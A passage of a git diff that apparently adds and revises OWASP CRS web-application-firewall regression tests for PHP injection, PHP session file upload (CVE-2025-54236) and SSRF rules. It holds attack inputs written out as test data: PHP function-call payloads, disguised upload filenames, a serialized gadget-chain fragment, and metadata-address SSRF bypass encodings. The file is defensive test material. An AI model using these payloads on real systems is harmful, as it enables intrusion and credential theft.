headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoRWIb3busvBrbttO + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: | + ------WebKitFormBoundaryoRWIb3busvBrbttO + Content-Disposition: form-data; name="file"; filename="test.php7.gif" + Content-Type: image/gif + + + + ------WebKitFormBoundaryoRWIb3busvBrbttO-- + version: HTTP/1.1 + output: + log: + expect_ids: [933111] + - test_id: 3 + desc: "PHP Injection Attack: PHP Script File Upload Found" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoRWIb3busvBrbttO + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + port: 80 + data: | + ------WebKitFormBoundaryoRWIb3busvBrbttO + Content-Disposition: form-data; name="file"; filename="test.phar.png" + Content-Type: image/png + + + + ------WebKitFormBoundaryoRWIb3busvBrbttO-- + version: HTTP/1.1 + output: + log: + expect_ids: [933111] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml index 497ce73c10..9e18cde878 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933150.yaml @@ -4,22 +4,6 @@ meta: rule_id: 933150 tests: - test_id: 1 - desc: phpinfo - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/phpinfo" - version: "HTTP/1.1" - output: - log: - expect_ids: [933150] - - test_id: 2 desc: base64_decode stages: - input: @@ -30,12 +14,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get/base64_decode" + uri: "/get/?test=base64_decode()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 3 + - test_id: 2 desc: base64_decode mixed case stages: - input: @@ -46,12 +30,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?base64_deCOde" + uri: "/get?base64_deCOde()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 4 + - test_id: 3 desc: bzdecompress stages: - input: @@ -62,12 +46,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=bzdecomprEss" + uri: "/get?foo=bzdecomprEss()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 5 + - test_id: 4 desc: call_user_func stages: - input: @@ -78,12 +62,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=FOOcall_user_func" + uri: "/get?foo=FOOcall_user_func()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 6 + - test_id: 5 desc: fsockopen stages: - input: @@ -94,12 +78,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=FOOfsockopen" + uri: "/get?foo=FOOfsockopen()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 7 + - test_id: 6 desc: gzdecode stages: - input: @@ -110,12 +94,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=FOOgzdecode" + uri: "/get?foo=FOOgzdecode()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 8 + - test_id: 7 desc: GzInFlAtE stages: - input: @@ -126,28 +110,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?foo=FOOGzInFlAtE" - version: "HTTP/1.1" - output: - log: - expect_ids: [933150] - - test_id: 9 - desc: pHpInFo mixed case - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?foo=FOOpHpInFo" + uri: "/get?foo=FOOGzInFlAtE()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 10 + - test_id: 8 desc: gzuncompress stages: - input: @@ -158,12 +126,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 - uri: "/get?I%20don%27t%20like%20gzuncompress" + uri: "/get?test=I%20don%27t%20like%20gzuncompress/*comment*/()" version: "HTTP/1.1" output: log: expect_ids: [933150] - - test_id: 11 + - test_id: 9 desc: fsockopen stages: - input: @@ -178,7 +146,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 12 + - test_id: 10 desc: posix_getpwuiD stages: - input: @@ -194,11 +162,11 @@ tests: output: log: expect_ids: [933150] - - test_id: 13 + - test_id: 11 desc: shell_exec stages: - input: - data: Shell%5fexec=bla + data: test=Shell%5fexec=(bla) dest_addr: 127.0.0.1 headers: Host: localhost @@ -211,11 +179,11 @@ tests: output: log: expect_ids: [933150] - - test_id: 14 + - test_id: 12 desc: ZlIb_DeCoDe stages: - input: - data: ZlIb%5fDeCoDe=bla + data: test=ZlIb%5fDeCoDe=(bla) dest_addr: 127.0.0.1 headers: Host: localhost @@ -228,7 +196,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 15 + - test_id: 13 desc: get_defined_functions stages: - input: @@ -245,7 +213,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 16 + - test_id: 14 desc: get_defined_vars stages: - input: @@ -262,7 +230,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 17 + - test_id: 15 desc: | PHP function call in body, mixed case. payload: curl_iNit() @@ -281,7 +249,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 18 + - test_id: 16 desc: | PHP function call in body payload: posix_getegid() @@ -300,7 +268,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 19 + - test_id: 17 desc: | PHP function call in body, mixed case payload: Print_r() @@ -319,7 +287,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 20 + - test_id: 18 desc: | PHP function call in body. payload: strrev() @@ -338,7 +306,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 21 + - test_id: 19 desc: | False Positive test payload: the files (yep) @@ -356,7 +324,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 22 + - test_id: 20 desc: | False Positive test, exec should be followed by parenthesis payload: exec ( @@ -374,7 +342,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 23 + - test_id: 21 desc: | False Positive test payload: executor() @@ -392,7 +360,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 24 + - test_id: 22 desc: | False Positive test payload: cheval($foo) @@ -410,7 +378,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 25 + - test_id: 23 desc: | False Positive test payload: audiofile($foo) @@ -428,7 +396,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 26 + - test_id: 24 desc: | False Positive test payload: the system is down() @@ -446,7 +414,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 27 + - test_id: 25 desc: | False Positive test payload: ecosystem() @@ -464,7 +432,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 28 + - test_id: 26 desc: | False Positive test, function doesn't exist payload: systems() @@ -482,7 +450,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 29 + - test_id: 27 desc: | False Positive test, function doesn't exist payload: system something() @@ -500,7 +468,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 30 + - test_id: 28 desc: "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - input: @@ -516,7 +484,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 31 + - test_id: 29 desc: "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 933160)" stages: - input: @@ -532,7 +500,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 32 + - test_id: 30 desc: | PHP mixed case function call with space, LF between (). payload: file_ExistS (\n\n) @@ -550,7 +518,7 @@ tests: output: log: expect_ids: [933150] - - test_id: 33 + - test_id: 31 desc: | False positive with filename matching `fopen` stages: @@ -567,7 +535,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 34 + - test_id: 32 desc: | SEO Framework false positive matching 'strip_tags' in 'title_strip_tags' @@ -585,7 +553,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 35 + - test_id: 33 desc: False positive with SprintForTheCause matching printf stages: - input: @@ -601,7 +569,7 @@ tests: output: log: no_expect_ids: [933150] - - test_id: 36 + - test_id: 34 desc: Don't block printf function (Handled by 933160) stages: - input: @@ -617,3 +585,83 @@ tests: output: log: no_expect_ids: [933150] + - test_id: 35 + desc: "False Positive: `unserialize` substring false positive" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=A%20loaded%20ghost%20gun%20(unserialized)%20was%20recovered%20in%20the%20car." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 36 + desc: "False Positive: phpinfo being used in english sentence" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=Moreover,%20phpinfo%20can%20potentially%20leak%20sensitive%20configuration%20details%20that%20an%20attacker%20can%20exploit%20to%20gain%20information%20about%20the%20server." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 37 + desc: "False Positive: `intval` substring false positive" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=PaintValdosta" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933150] + - test_id: 38 + desc: "True Positive: match open parenthesis" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/?test=base64_decode(" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] + - test_id: 39 + desc: "True Positive: match encoded parenthesis" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/?test=base64_decode%28" + version: "HTTP/1.1" + output: + log: + expect_ids: [933150] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml index 0d2dcfeb66..07608bce5f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933160.yaml @@ -795,3 +795,99 @@ tests: output: log: expect_ids: [933160] + - test_id: 45 + desc: "False Positive: `unserialize` substring false positive" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=A%20loaded%20ghost%20gun%20(unserialized)%20was%20recovered%20in%20the%20car." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 46 + desc: "False Positive: phpinfo being used in english sentence" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=Moreover,%20phpinfo%20can%20potentially%20leak%20sensitive%20configuration%20details%20that%20an%20attacker%20can%20exploit%20to%20gain%20information%20about%20the%20server." + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 47 + desc: "False Positive: `intval` substring false positive" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=PaintValdosta" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933160] + - test_id: 48 + desc: "True Positive: Block intval function" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=intval(foo)" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 49 + desc: "True Positive: Block phpinfo function" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=phpinfo(foo)" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] + - test_id: 50 + desc: "True Positive: Block unserialize function" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post/?test=unserialize(foo)" + version: "HTTP/1.1" + output: + log: + expect_ids: [933160] diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933220.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933220.yaml new file mode 100644 index 0000000000..9816c1557f --- /dev/null +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933220.yaml @@ -0,0 +1,349 @@ +--- +meta: + author: "Felipe Zipitria" + description: "Tests for PHP Session File Upload Detection (CVE-2025-54236)" +rule_id: 933220 +tests: + - test_id: 1 + desc: "Should block: sess_ pattern via X-Filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_d8ew88tqmabdcokhumchy8htqm + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 2 + desc: "Should block: sess_ pattern with Unix path via X_Filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: /tmp/sess_abc123def456ghi789jkl + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 3 + desc: "Should block: sess_ pattern with Windows path via X-File-Name" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: 'C:\temp\sess_malicious12345678901' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 4 + desc: "Should block: sess_ pattern via X.Filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X.Filename: sess_1234567890abcdefghij + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 5 + desc: "Should block: sess_ pattern via multipart upload" + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="file"; filename="sess_d8ew88tqmabdcokhumchy8htqm" + Content-Type: text/plain + + _|O:32:"Monolog\Handler\SyslogUdpHandler":1:{S:6:"socket";O:29:"Monolog\Handler\BufferHandler":7:{}} + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 6 + desc: "Should block: sess_ with hyphens in session ID" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_abc-123-def-456-ghij + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 7 + desc: "Should block: sess_ pattern with nested path" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: /var/lib/php/sessions/sess_attackervector1234567890 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 8 + desc: "Should pass: normal filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: document.pdf + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 9 + desc: "Should pass: sess_ in middle of filename" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: my_sess_data.txt + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 10 + desc: "Should pass: session as part of word" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: session_report.txt + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 11 + desc: "Should pass: sess_ with too short session ID" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_short + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 12 + desc: "Should pass: file with .sess extension" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: mydata.sess + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 13 + desc: "Should pass: no file upload" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: / + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 14 + desc: "Should block: sess_ with maximum length session ID (64 chars)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_abcdefghijklmnopqrstuvwxyz0123456789abcdefghijklmnopqrstuvwx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 15 + desc: "Should block: sess_ with minimum length session ID (20 chars)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_12345678901234567890 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 16 + desc: "Should block: sess_ via multipart with path" + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="custom_attributes[vat_id]"; filename="/tmp/sess_d8ew88tqmabdcokhumchy8htqm" + Content-Type: text/plain + + malicious payload + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 17 + desc: "Should pass: multipart upload with safe filename" + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="file"; filename="safe_document.txt" + Content-Type: text/plain + + safe content + ----------397236876-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [933220] + - test_id: 18 + desc: "Should block: sess_ with commas in session ID (6-bit encoding)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_abc123,def456,ghi789jkl + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 19 + desc: "Should block: sess_ with uppercase letters (verify lowercase transformation)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: sess_ABC123def456ghi789jkl + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] + - test_id: 20 + desc: "Should block: SESS_ uppercase prefix (verify lowercase transformation)" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: SESS_abc123def456ghi789jkl + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + uri: /upload + version: "HTTP/1.1" + output: + log: + expect_ids: [933220] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml index b71b664ce6..8161b5945e 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934110.yaml @@ -148,3 +148,21 @@ tests: output: log: no_expect_ids: [934110] + - test_id: 9 + desc: SSRF - check localhost bypass with malformed URL + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get/test?ssrf=http%3A127.0.0.1" + version: "HTTP/1.1" + output: + log: + expect_ids: [934110] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml index 697f26b79a..021cd7253d 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934120.yaml @@ -887,3 +887,147 @@ tests: output: log: expect_ids: [934120] + - test_id: 45 + desc: SSRF - malformed URL with dotless decimal (missing slashes) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A2852039166" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 46 + desc: SSRF - malformed URL with dotless hexadecimal (missing slashes) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A0xA9FEA9FE" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 47 + desc: SSRF - malformed URL with IPv6 (missing slashes) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A[::ffff:a9fe:a9fe]" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 48 + desc: SSRF - malformed URL with one slash - dotless decimal + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A%2F2852039166" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 49 + desc: SSRF - malformed URL with dotted octal (missing slashes) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A0251.0376.0251.0376" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 50 + desc: SSRF - malformed URL with 9-digit dotless decimal (converts to 7.91.205.21) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A123456789" + version: "HTTP/1.1" + output: + log: + expect_ids: [934120] + - test_id: 51 + desc: SSRF - Negative test - malformed URL with invalid hex format (too short) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=http%3A0xABCDEF" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934120] + - test_id: 52 + desc: SSRF - Negative test - incomplete dotted hex (only 3 octets) + stages: + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 